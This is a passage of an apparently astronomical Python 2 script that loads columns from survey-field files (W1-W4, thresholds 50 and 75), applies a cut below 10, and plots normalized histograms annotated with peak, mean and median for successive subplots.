n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(459)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_{M^3_{rms}}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 8
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=17
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,11)
rangemax=4
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,11)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{z}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 9
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=19
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,12)
rangemax=7
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,12)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 10
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=21
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,13)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
n_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
ax=plt.subplot(4,5,13)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))
ax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))
ax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))
ax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)
s = "50: %.3f,%.3f,%.3f" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))
ax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))
ax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))
ax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))
ax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)
s = "75: %.3f,%.3f,%.3f" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))
ax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)
plt.xlabel(r'$\zeta_\frac{M^2}{r}$', fontsize=15)
plt.ylabel("Normalized cnts", fontsize=7)
plt.tick_params(axis='x', labelsize=6)
plt.tick_params(axis='y', labelsize=6)
plt.setp(plt.xticks()[1], rotation=90)
subplot = 11
print "finished subplot %d/16; fraction of points inside the q < 10 cut: \n W1_50 %.3f W1_75 %.3f \n W2_50 %.3f W2_75 %.3f \n W3_50 %.3f W3_75 %.3f \n W4_50 %.3f W4_75 %.3f " % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)
cols=23
q_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_50 = q_W1_50read[q_W1_50read < 10]
q_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_50 = q_W2_50read[q_W2_50read < 10]
q_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_50 = q_W3_50read[q_W3_50read < 10]
q_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_50 = q_W4_50read[q_W4_50read < 10]
q_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W1_75 = q_W1_75read[q_W1_75read < 10]
q_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W2_75 = q_W2_75read[q_W2_75read < 10]
q_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W3_75 = q_W3_75read[q_W3_75read < 10]
q_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)
q_W4_75 = q_W4_75read[q_W4_75read < 10]
plt.subplot(4,5,14)
rangemax=6
n_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])
n_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')
